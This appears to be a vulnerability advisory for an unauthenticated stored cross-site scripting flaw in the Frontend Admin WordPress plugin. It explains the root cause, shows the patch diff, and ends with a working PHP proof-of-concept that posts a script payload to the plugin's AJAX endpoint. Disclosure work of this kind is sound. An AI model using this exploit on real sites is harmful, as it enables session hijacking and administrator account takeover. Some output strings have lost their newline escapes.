Atomic Edge analysis of CVE-2025-14937:
The Frontend Admin WordPress plugin contains an unauthenticated stored cross-site scripting vulnerability in versions up to 3.28.23. The vulnerability exists in the AJAX handler for the ‘update_field’ action, allowing attackers to inject malicious scripts that execute when users view affected pages. The CVSS score of 7.2 reflects the high impact of stored XSS combined with unauthenticated access.
Atomic Edge research identified the root cause as insufficient input sanitization in the ‘frontend_admin/forms/update_field’ AJAX action. The vulnerable code path begins in the ‘submit.php’ file where user-supplied data from the ‘acff’ parameter flows through the form submission process. Specifically, in the ‘acf-frontend-form-element/main/frontend/forms/classes/submit.php’ file, the $value variable receives user input without proper sanitization before reaching the validation and update functions. The code processes this input through the ‘acf_update_value’ function without adequate sanitization when the ‘kses’ form setting is not enabled.
Exploitation occurs via unauthenticated POST requests to the WordPress AJAX endpoint at ‘/wp-admin/admin-ajax.php’. Attackers set the ‘action’ parameter to ‘frontend_admin/forms/update_field’ and include malicious JavaScript payloads within the ‘acff’ parameter structure. The payload format follows the plugin’s field update structure, typically as ‘acff[source][field_key]=malicious_code’. No authentication or nonce verification is required, making the attack vector accessible to any remote user.
The patch in version 3.28.24 adds consistent input sanitization across all code paths. The critical change occurs in ‘submit.php’ at line 47, where the code now applies ‘feadmin_sanitize_input()’ to the $value variable before validation. This sanitization occurs via the ‘frontend_admin/forms/sanitize_input’ filter hook. The patch also removes redundant conditional logic and ensures the sanitization filter always receives properly sanitized input as its default value. These changes guarantee that user input undergoes sanitization regardless of the ‘kses’ form setting.
Successful exploitation enables attackers to inject arbitrary JavaScript code that persists in the WordPress database. Injected scripts execute in the context of authenticated users who view pages containing the malicious content. This can lead to session hijacking, administrative account takeover, content defacement, and data exfiltration. The stored nature of the vulnerability means a single successful attack can affect multiple users over time without requiring repeated exploitation attempts.
--- a/acf-frontend-form-element/acf-frontend.php
+++ b/acf-frontend-form-element/acf-frontend.php
@@ -3,7 +3,7 @@
* Plugin Name: Frontend Admin
* Plugin URI: https://www.dynamiapps.com/frontend-admin/
* Description: This awesome plugin allows you to easily display admin forms to the frontend of your site so your clients can easily edit content on their own from the frontend.
- * Version: 3.28.23
+ * Version: 3.28.24
* Author: Shabti Kaplan
* Author URI: https://www.dynamiapps.com/
* Text Domain: frontend-admin
--- a/acf-frontend-form-element/main/frontend/forms/classes/submit.php
+++ b/acf-frontend-form-element/main/frontend/forms/classes/submit.php
@@ -44,9 +44,13 @@
}
$input = 'acff[' . $source . '][' . $key . ']';
+ $value = apply_filters( 'frontend_admin/forms/sanitize_input', feadmin_sanitize_input( $value, $field ), $field );
+
// validate
$valid = $form_validate->validate_value( $value, $field, $input );
if ( $valid ) {
+ // sanitize input based on field settings
+
acf_update_value( $value, $source, $field );
if ( empty( $fields_select ) ) {
@@ -243,12 +247,7 @@
if( $form['kses'] ){
// sanitize input based on field settings
- $sanitized = apply_filters( 'frontend_admin/forms/sanitize_input', false, $input, $field );
- if( ! $sanitized ){
- $input = feadmin_sanitize_input( $input, $field );
- }else{
- $input = $sanitized;
- }
+ $input = apply_filters( 'frontend_admin/forms/sanitize_input', feadmin_sanitize_input( $input, $field ), $field );
}
if ( $field['type'] == 'fields_select' ) {
--- a/acf-frontend-form-element/main/helpers.php
+++ b/acf-frontend-form-element/main/helpers.php
@@ -839,11 +839,6 @@
$nonce_to_check = ! empty( $nonce ) ? $nonce : $_REQUEST['nonce']; // phpcs:ignore WordPress.Security -- We're verifying a nonce here.
$nonce_action = ! empty( $action ) ? $action : 'acf_nonce';
-
- error_log('checking');
- error_log( $nonce_to_check );
- error_log( $nonce_action );
-
// Bail if nonce can't be verified.
if ( ! wp_verify_nonce( sanitize_text_field( $nonce_to_check ), $nonce_action ) ) {
error_log('not verified');
--- a/acf-frontend-form-element/main/plugin.php
+++ b/acf-frontend-form-element/main/plugin.php
@@ -102,7 +102,7 @@
define( 'FEA_URL', $data['plugin_url'] );
define( 'FEA_DIR', $data['plugin_dir'] );
define( 'FEA_PLUGIN', $data['plugin'] );
- define( 'FEA_VERSION', '3.28.23' );
+ define( 'FEA_VERSION', '3.28.24' );
do_action( 'front_end_admin_loaded' );
// Add tutorial videos to plugin item on plugins page
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14937 - Frontend Admin by DynamiApps <= 3.28.23 - Unauthenticated Stored Cross-Site Scripting via 'update_field'
<?php
$target_url = 'https://vulnerable-site.com';
// Malicious JavaScript payload to demonstrate XSS
$payload = '<script>alert("Atomic Edge Research - XSS via CVE-2025-14937")</script>';
// Construct the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Prepare the POST data with the vulnerable parameter structure
$post_data = array(
'action' => 'frontend_admin/forms/update_field',
'acff' => array(
'post' => array(
'title' => $payload // Field key may vary based on target configuration
)
)
);
// Convert nested array to proper POST format
$post_fields = http_build_query($post_data);
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Set appropriate headers for WordPress AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/x-www-form-urlencoded',
'X-Requested-With: XMLHttpRequest'
));
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Check response
if ($http_code == 200) {
echo "[+] Exploit attempt completed. HTTP $http_coden";
echo "[+] Response: " . substr($response, 0, 200) . "...n";
echo "[+] Check the target page for XSS execution.n";
} else {
echo "[-] Request failed with HTTP $http_coden";
echo "[-] Response: " . $response . "n";
}
curl_close($ch);
?>
